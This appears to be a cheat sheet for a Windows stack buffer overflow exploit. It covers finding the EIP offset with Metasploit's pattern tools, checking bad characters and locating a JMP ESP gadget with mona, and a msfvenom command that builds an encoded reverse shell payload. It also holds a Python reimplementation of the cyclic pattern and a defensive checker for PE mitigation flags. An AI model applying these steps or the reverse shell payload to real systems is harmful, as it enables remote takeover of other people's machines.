Trigger the bug

  • Send lots of A’s

  • Expect a crash with EIP overwritten by 0x41414141 (four of the A's)

Discover offsets

  • Metasploit’s pattern_create.rb

    • ~/opt/metasploit-framework/tools/exploit/pattern_create.rb -l 1024
  • Locate the EIP register value, find offset

    • /opt/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP value>
  • Copy the bad_chars bin file to victim box, run mona

  • Find bad characters using the bin

    • !mona cmp -f C:\bad_chars.bin -a 0x014a19f8 (esp location)
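To show what the two pattern tools above actually do (and why a crash value in EIP maps to a buffer offset), here is an added Python reimplementation of the Metasploit "Aa0Aa1Aa2…" cyclic pattern. It is example code, not Metasploit's own pattern_create.rb / pattern_offset.rb; the function names pattern_create and pattern_offset are chosen here to mirror those tools, and the 20,280-byte limit is the length at which the three-character sequence repeats.

```python
"""Metasploit-style cyclic pattern: generate it and locate an offset in it.

Added example (not Metasploit's code). Every 4-byte window in the pattern is
unique within the first 26 * 26 * 10 * 3 = 20280 bytes, which is why the value
that lands in EIP identifies exactly one position in the sent buffer.
"""
import string
import struct

PATTERN_MAX = 26 * 26 * 10 * 3  # 20280: length before the sequence repeats


def pattern_create(length):
    """Return the first `length` bytes of the Aa0Aa1Aa2... sequence
    (what pattern_create.rb -l <length> prints)."""
    if length > PATTERN_MAX:
        raise ValueError("pattern would repeat beyond %d bytes" % PATTERN_MAX)
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # only reached for length == 0


def pattern_offset(query, length=PATTERN_MAX):
    """Locate `query` in the pattern (what pattern_offset.rb -q does).

    `query` may be an int such as 0x41306141 (the value read from EIP), a
    string "0x41306141", or the raw 4 bytes. A register value is converted
    with little-endian byte order, because that is how the bytes were loaded
    from the buffer on x86. Returns the 0-based offset, or None if the value
    did not come from the pattern at all.
    """
    if isinstance(query, int):
        needle = struct.pack("<I", query)
    elif isinstance(query, str) and query.lower().startswith("0x"):
        needle = struct.pack("<I", int(query, 16))
    elif isinstance(query, str):
        needle = query.encode()
    else:
        needle = bytes(query)
    idx = pattern_create(length).find(needle)
    return None if idx == -1 else idx


if __name__ == "__main__":
    # Constructed demo: a crash value of 0x41306141 corresponds to "Aa0A"
    # in memory, i.e. the very start of the pattern.
    print(pattern_create(40).decode())
    print(pattern_offset(0x41306141))
```

A None result is worth checking for: it means the register was not overwritten by the pattern (for example the crash was caused by a different corrupted pointer), and searching for "the offset" would be chasing the wrong value.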

Settle on a spot to stick some shellcode

  • Follow the trailing "CC" characters and identify the buffer size

  • Take the difference between the end ESP and the beginning ESP (use a hex calculator)

Locate a jump_esp

  • Search memory for sequences of bytes (or "gadgets") that correspond to a JMP to the address stored in a given register.

  • With the binary in either a running or crashed state, run:

    • !mona jmp -r esp -cpb "\x00\x0A"

  • This makes mona search all memory that contains program code and is not subject to ASLR (-cpb excludes any pointer that contains the listed bad characters)

  • Usually doesn’t work, so try the following

    • !mona modules

  • This will list the loaded modules and the protections enabled on each. Find a DLL that doesn't have Rebase, ASLR, DEP, or SafeSEH enabled. Then search that DLL for a JMP ESP. The opcode for JMP ESP is FF E4.

    • !mona find -s "\xff\xe4" -m .dll
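The module list that "!mona modules" prints comes straight from flags in each module's PE header, so the same information is available to a defender auditing a build before it ships. The following is an added Python example, not mona's code: it parses the COFF and optional headers and reports whether an image opts into ASLR (DYNAMIC_BASE), DEP (NX_COMPAT), high-entropy 64-bit ASLR, Control Flow Guard, whether it declares no SEH at all (NO_SEH), and whether it can be rebased (relocations not stripped). The function names audit_pe, missing_mitigations and build_minimal_pe are this example's own, and build_minimal_pe fabricates a header-only stub purely so the code can be run without a real DLL.

```python
"""Report the compile-time exploit mitigations a PE image opts into.

Added example, not mona's code. Reads the flags behind the Rebase / ASLR /
DEP columns directly from the PE headers (PE32 and PE32+).
"""
import struct
import sys

# IMAGE_DLLCHARACTERISTICS_* values from the PE/COFF specification.
HIGH_ENTROPY_VA = 0x0020  # 64-bit ASLR with high-entropy addresses
DYNAMIC_BASE = 0x0040     # ASLR opt-in
NX_COMPAT = 0x0100        # DEP opt-in
NO_SEH = 0x0400           # image declares it uses no SEH handlers
GUARD_CF = 0x4000         # Control Flow Guard

# IMAGE_FILE_* characteristic: relocations stripped, so the loader cannot
# rebase the module (mona's "Rebase" column would be False).
RELOCS_STRIPPED = 0x0001


def audit_pe(data):
    """Return a dict of mitigation flags for the PE image in `data`.

    Raises ValueError if the buffer is not a PE image.
    """
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    (_machine, _nsect, _ts, _psym, _nsym, opt_size, file_chars) = \
        struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if opt_size < 72:
        raise ValueError("optional header too short")
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ layouts.
    (dll_chars,) = struct.unpack_from("<H", data, opt + 70)
    return {
        "pe32plus": magic == 0x20B,
        "aslr": bool(dll_chars & DYNAMIC_BASE),
        "high_entropy_va": bool(dll_chars & HIGH_ENTROPY_VA),
        "dep": bool(dll_chars & NX_COMPAT),
        "no_seh": bool(dll_chars & NO_SEH),
        "cfg": bool(dll_chars & GUARD_CF),
        "rebase": not (file_chars & RELOCS_STRIPPED),
    }


def missing_mitigations(report):
    """Names of the baseline protections (ASLR, DEP, Rebase) that are absent."""
    return sorted(k for k in ("aslr", "dep", "rebase") if not report[k])


def build_minimal_pe(dll_chars, file_chars=0, magic=0x10B):
    """Constructed header-only PE stub for demonstration; not loadable."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew -> right after DOS header
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 70, dll_chars)
    machine = 0x14C if magic == 0x10B else 0x8664   # i386 / x64
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, len(opt), file_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            report = audit_pe(f.read())
        print(path, report, "missing:", missing_mitigations(report))
```

Run it as `python audit_pe.py some.dll` to get the same verdict the mona listing gives for that module; anything returned by missing_mitigations is a module that would satisfy the search described above, and the fix is a build setting (/DYNAMICBASE, /NXCOMPAT, and keeping relocations) rather than anything at runtime. One caveat: SafeSEH is recorded in the load configuration directory, not in DllCharacteristics, so this header-only check does not determine it; NO_SEH only says the image claims to use no handlers at all.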

Create shellcode and prepend some nops

  • Search payloads

    • msfvenom -l payloads

    • msfvenom --payload-options -p windows/shell/reverse_tcp

  • Reverse shell

    • msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"